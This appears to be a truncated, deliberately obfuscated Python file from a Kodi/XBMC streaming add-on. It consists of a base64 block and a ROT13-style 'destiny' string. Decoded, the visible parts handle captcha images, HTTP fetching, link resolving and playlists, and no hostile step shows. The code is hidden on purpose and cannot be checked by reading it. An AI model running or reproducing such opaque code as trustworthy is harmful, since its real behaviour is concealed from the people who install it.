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GFfaysnJmNhcHRjaGFfaz0xJnR5cGU9aW1hZ2UmbGFuZz1lbi1HQicKCQljYXB0Y2hhX3JlbG9hZF9qcz1nZXRVcmwoY2FwdGNoYV9yZWxvYWQpCgkJY2FwdGNoYV9yZWxvYWRfcmVzcG9uc2VfY2hhbGw9cmUuZmluZGFsbChjYXBfaW1hZ2VfcmVnLCBjYXB0Y2hhX3JlbG9hZF9qcylbMF0KCQljYXB0Y2hhX2ltYWdlX3VybD0naHR0cDovL3d3dy5nb29nbGUuY29tL3JlY2FwdGNoYS9hcGkvaW1hZ2U/Yz0nK2NhcHRjaGFfcmVsb2FkX3Jlc3BvbnNlX2NoYWxsCgkJaWYgbm90IGNhcHRjaGFfaW1hZ2VfdXJsLnN0YXJ0c3dpdGgoImh0dHAiKToKCQkJY2FwdGNoYV9pbWFnZV91cmw9J2h0dHA6Ly93d3cuZ29vZ2xlLmNvbS9yZWNhcHRjaGEvYXBpLycrY2FwdGNoYV9pbWFnZV91cmwKCQlpbXBvcnQgcmFuZG9tCgkJbj1yYW5kb20ucmFuZHJhbmdlKDEwMCwxMDAwLDUpCgkJbG9jYWxfY2FwdGNoYSA9IG9zLnBhdGguam9pbihwcm9maWxlLHN0cihuKSArImNhcHRjaGEuaW1nIiApCgkJbG9jYWxGaWxlID0gb3Blbihsb2NhbF9jYXB0Y2hhLCAid2IiKQoJCWxvY2FsRmlsZS53cml0ZShnZXRVcmwoY2FwdGNoYV9pbWFnZV91cmwpKQoJCWxvY2FsRmlsZS5jbG9zZSgpCgkJc29sdmVyID0gSW5wdXRXaW5kb3coY2FwdGNoYT1sb2NhbF9jYXB0Y2hhKQoJCXNvbHV0aW9uID0gc29sdmVyLmdldCgpCgkJb3MucmVtb3ZlKGxvY2FsX2NhcHRjaGEpCglyZXR1cm4gY2FwdGNoYV9yZWxvYWRfcmVzcG9uc2VfY2hhbGwgLHNvbHV0aW9uCgpkZWYgZ2V0VXJsKHVybCwgY29va2llSmFyPU5vbmUscG9zdD1Ob25lLCB0aW1lb3V0PTIwLCBoZWFkZXJzPU5vbmUpOgoKCgljb29raWVfaGFuZGxlciA9IHVybGxpYjIuSFRUUENvb2tpZVByb2Nlc3Nvcihjb29raWVKYXIpCglvcGVuZXIgPSB1cmxsaWIyLmJ1aWxkX29wZW5lcihjb29raWVfaGFuZGxlciwgdXJsbGliMi5IVFRQQmFzaWNBdXRoSGFuZGxlcigpLCB1cmxsaWIyLkhUVFBIYW5kbGVyKCkpCgkjb3BlbmVyID0gdXJsbGliMi5pbnN0YWxsX29wZW5lcihvcGVuZXIpCglyZXEgPSB1cmxsaWIyLlJlcXVlc3QodXJsKQoJcmVxLmFkZF9oZWFkZXIoJ1VzZXItQWdlbnQnLCdNb3ppbGxhLzUuMCAoV2luZG93cyBOVCA2LjE7IFdPVzY0KSBBcHBsZVdlYktpdC81MzcuMzYgKEtIVE1MLCBsaWtlIEdlY2tvKSBDaHJvbWUvMzMuMC4xNzUwLjE1NCBTYWZhcmkvNTM3LjM2JykKCWlmIGhlYWRlcnM6CgkJZm9yIGgsaHYgaW4gaGVhZGVyczoKCQkJcmVxLmFkZF9oZWFkZXIoaCxodikKCglyZXNwb25zZSA9IG9wZW5lci5vcGVuKHJlcSxwb3N0LHRpbWVvdXQ9dGltZW91dCkKCWxpbms9cmVzcG9uc2UucmVhZCgpCglyZXNwb25zZS5jbG9zZSgpCglyZXR1cm4gbGluazsKCmRlZiBnZXRfZGVjb2RlKHN0cixyZWc9Tm9uZSk6CglpZiByZWc6CgkJc3RyPXJlLmZpbmRhbGwocmVnLCBzdHIpWzBdCglzMSA9IHVybGxpYi51bnF1b3RlKHN0clswOiBsZW4oc3RyKS0xXSk7Cgl0ID0gJyc7Cglmb3IgaSBpbiByYW5nZSggbGVuKHMxKSk6CgkJdCArPSBjaHIob3JkKHMxW2ldKSAtIHMxW2xlbihzMSktMV0pOwoJdD11cmxsaWIudW5xdW90ZSh0KQoJcHJpbnQgdAoJcmV0dXJuIHQKCmRlZiBqYXZhc2NyaXB0VW5Fc2NhcGUoc3RyKToKCWpzPXJlLmZpbmRhbGwoJ3VuZXNjYXBlXChcJyguKj8pXCcnLHN0cikKCXByaW50ICdqcycsanMKCWlmIChub3QganM9PU5vbmUpIGFuZCBsZW4oanMpPjA6CgkJZm9yIGogaW4ganM6CgkJCSNwcmludCB1cmxsaWIudW5xdW90ZShqKQoJCQlzdHI9c3RyLnJlcGxhY2UoaiAsdXJsbGliLnVucXVvdGUoaikpCglyZXR1cm4gc3RyCgppaWQ9MApkZWYgYXNrQ2FwdGNoYShtLGh0bWxfcGFnZSwgY29va2llSmFyKToKICAgIGdsb2JhbCBpaWQKICAgIGlpZCs9MQogICAgZXhwcmU9IG1bJ2V4cHJlJ10KICAgIHBhZ2VfdXJsID0gbVsncGFnZSddCiAgICBjYXB0Y2hhX3JlZ2V4PXJlLmNvbXBpbGUoJ1wkTGl2ZVN0cmVhbUNhcHRjaGFcWyhbXlxdXSopXF0nKS5maW5kYWxsKGV4cHJlKVswXQoKICAgIGNhcHRjaGFfdXJsPXJlLmNvbXBpbGUoY2FwdGNoYV9yZWdleCkuZmluZGFsbChodG1sX3BhZ2UpWzBdCiAgICBwcmludCBleHByZSxjYXB0Y2hhX3JlZ2V4LGNhcHRjaGFfdXJsCiAgICBpZiBub3QgY2FwdGNoYV91cmwuc3RhcnRzd2l0aCgiaHR0cCIpOgogICAgICAgIHBhZ2VfPSdodHRwOi8vJysiIi5qb2luKHBhZ2VfdXJsLnNwbGl0KCcvJylbMjozXSkKICAgICAgICBpZiBjYXB0Y2hhX3VybC5zdGFydHN3aXRoKCIvIik6CiAgICAgICAgICAgIGNhcHRjaGFfdXJsPXBhZ2VfK2NhcHRjaGFfdXJsCiAgICAgICAgZWxzZToKICAgICAgICAgICAgY2FwdGNoYV91cmw9cGFnZV8rJy8nK2NhcHRjaGFfdXJsCiAgICAKICAgIGxvY2FsX2NhcHRjaGEgPSBvcy5wYXRoLmpvaW4ocHJvZmlsZSwgc3RyKGlpZCkrImNhcHRjaGEuanBnIiApCiAgICBsb2NhbEZpbGUgPSBvcGVuKGxvY2FsX2NhcHRjaGEsICJ3YiIpCiAgICBwcmludCAnIGMgY2FwdXJsJyxjYXB0Y2hhX3VybAogICAgcmVxID0gdXJsbGliMi5SZXF1ZXN0KGNhcHRjaGFfdXJsKQogICAgcmVxLmFkZF9oZWFkZXIoJ1VzZXItQWdlbnQnLCAnTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgNi4xOyBydjoxNC4wKSBHZWNrby8yMDEwMDEwMSBGaXJlZm94LzE0LjAuMScpCiAgICBpZiAncmVmZXInIGluIG06CiAgICAgICAgcmVxLmFkZF9oZWFkZXIoJ1JlZmVyZXInLCBtWydyZWZlciddKQogICAgaWYgJ2FnZW50JyBpbiBtOgogICAgICAgIHJlcS5hZGRfaGVhZGVyKCdVc2VyLWFnZW50JywgbVsnYWdlbnQnXSkKICAgIGlmICdzZXRjb29raWUnIGluIG06CiAgICAgICAgcHJpbnQgJ2FkZGluZyBjb29raWUnLG1bJ3NldGNvb2tpZSddCiAgICAgICAgcmVxLmFkZF9oZWFkZXIoJ0Nvb2tpZScsIG1bJ3NldGNvb2tpZSddKQogICAgICAgIAogICAgI2Nvb2tpZV9oYW5kbGVyID0gdXJsbGliMi5IVFRQQ29va2llUHJvY2Vzc29yKGNvb2tpZUphcikKICAgICNvcGVuZXIgPSB1cmxsaWIyLmJ1aWxkX29wZW5lcihjb29raWVfaGFuZGxlciwgdXJsbGliMi5IVFRQQmFzaWNBdXRoSGFuZGxlcigpLCB1cmxsaWIyLkhUVFBIYW5kbGVyKCkpCiAgICAjb3BlbmVyID0gdXJsbGliMi5pbnN0YWxsX29wZW5lcihvcGVuZXIpCiAgICB1cmxsaWIyLnVybG9wZW4ocmVxKQogICAgcmVzcG9uc2UgPSB1cmxsaWIyLnVybG9wZW4ocmVxKQoKICAgIGxvY2FsRmlsZS53cml0ZShyZXNwb25zZS5yZWFkKCkpCiAgICByZXNwb25zZS5jbG9zZSgpCiAgICBsb2NhbEZpbGUuY2xvc2UoKQogICAgc29sdmVyID0gSW5wdXRXaW5kb3coY2FwdGNoYT1sb2NhbF9jYXB0Y2hhKQogICAgc29sdXRpb24gPSBzb2x2ZXIuZ2V0KCkKICAgIHJldHVybiBzb2x1dGlvbgogICAgCmNsYXNzIElucHV0V2luZG93KHhibWNndWkuV2luZG93RGlhbG9nKToKICAgIGRlZiBfX2luaXRfXyhzZWxmLCAqYXJncywgKiprd2FyZ3MpOgogICAgICAgIHNlbGYuY3B0bG9jID0ga3dhcmdzLmdldCgnY2FwdGNoYScpCiAgICAgICAgc2VsZi5pbWcgPSB4Ym1jZ3VpLkNvbnRyb2xJbWFnZSgzMzUsMzAsNjI0LDYwLHNlbGYuY3B0bG9jKQogICAgICAgIHNlbGYuYWRkQ29udHJvbChzZWxmLmltZykKICAgICAgICBzZWxmLmtiZCA9IHhibWMuS2V5Ym9hcmQoKQoKICAgIGRlZiBnZXQoc2VsZik6CiAgICAgICAgc2VsZi5zaG93KCkKICAgICAgICB0aW1lLnNsZWVwKDIpICAgICAgICAKICAgICAgICBzZWxmLmtiZC5kb01vZGFsKCkKICAgICAgICBpZiAoc2VsZi5rYmQuaXNDb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iAgICAgICAgeGJtYy5leGVjdXRlYnVpbHRpbigiWEJNQy5Ob3RpZmljYXRpb24oQ29uZXjDo28gUGxheSxVc2luZyBVcmxyZXNvbHZlciBtb2R1bGUuLiAtICw1MDAwKSIpCiAgICAgICAgaW1wb3J0IHVybHJlc29sdmVyCiAgICAgICAgaG9zdCA9IHVybHJlc29sdmVyLkhvc3RlZE1lZGlhRmlsZSh1cmwpCiAgICAgICAgaWYgaG9zdDoKICAgICAgICAgICAgcmVzb2x2ZXIgPSB1cmxyZXNvbHZlci5yZXNvbHZlKHVybCkKICAgICAgICAgICAgcmVzb2x2ZWQgPSByZXNvbHZlcgogICAgaWYgcmVzb2x2ZWQgOgogICAgICAgIGlmIGlzaW5zdGFuY2UocmVzb2x2ZWQsbGlzdCk6CiAgICAgICAgICAgIGZvciBrIGluIHJlc29sdmVkOgogICAgICAgICAgICAgICAgcXVhbGl0eSA9IGFkZG9uLmdldFNldHRpbmcoJ3F1YWxpdHknKQogICAgICAgICAgICAgICAgaWYga1sncXVhbGl0eSddID09ICdIRCcgIDoKICAgICAgICAgICAgICAgICAgICByZXNvbHZlciA9IGtbJ3VybCddCiAgICAgICAgICAgICAgICAgICAgYnJlYWsKICAgICAgICAgICAgICAgIGVsaWYga1sncXVhbGl0eSddID09ICdTRCcgOgogICAgICAgICAgICAgICAgICAgIHJlc29sdmVyID0ga1sndXJsJ10KICAgICAgICAgICAgICAgIGVsaWYga1sncXVhbGl0eSddID09ICcxMDgwcCcgYW5kIGFkZG9uLmdldFNldHRpbmcoJzEwODBwcXVhbGl0eScpID09ICd0cnVlJyA6CiAgICAgICAgICAgICAgICAgICAgcmVzb2x2ZXIgPSBrWyd1cmwnXQogICAgICAgICAgICAgICAgICAgIGJyZWFrCiAgICAgICAgZWxzZToKICAgICAgICAgICAgcmVzb2x2ZXIgPSByZXNvbHZlZAogICAgcmV0dXJuIHJlc29sdmVyCmRlZiBwbGF5X3BsYXlsaXN0KG5hbWUsIG11X3BsYXlsaXN0LHF1ZXVlVmlkZW89Tm9uZSk6CiAgICAgICAgcGxheWxpc3QgPSB4Ym1jLlBsYXlMaXN0KHhibWMuUExBWUxJU1RfVklERU8pCiAgICAgICAgaWYgJyQkTFNQbGF5T25seU9uZSQkJyBpbiBtdV9wbGF5bGlzdFswXToKICAgICAgICAgICAgbXVfcGxheWxpc3RbMF09bXVfcGxheWxpc3RbMF0ucmVwbGFjZSgnJCRMU1BsYXlPbmx5T25lJCQnLCcnKQogICAgICAgICAgICBpbXBvcnQgdXJscGFyc2UKICAgICAgICAgICAgbmFtZXMgPSBbXQogICAgICAgICAgICBpbG9vcD0wCiAgICAgICAgICAgIHByb2dyZXNzID0geGJtY2d1aS5EaWFsb2dQcm9ncmVzcygpCiAgICAgICAgICAgIHByb2dyZXNzLmNyZWF0ZSgnUHJvZ3Jlc3MnLCAnVHJ5aW5nIE11bHRpcGxlIExpbmtzJykKICAgICAgICAgICAgZm9yIGkgaW4gbXVfcGxheWxpc3Q6CgogICAgICAgICAgICAgICAgaWYgJyRub21lPScgaW4gaToKICAgICAgICAgICAgICAgICAgICBkX25hbWU9aS5zcGxpdCgnJG5vbWU9JylbMV0uc' destiny = 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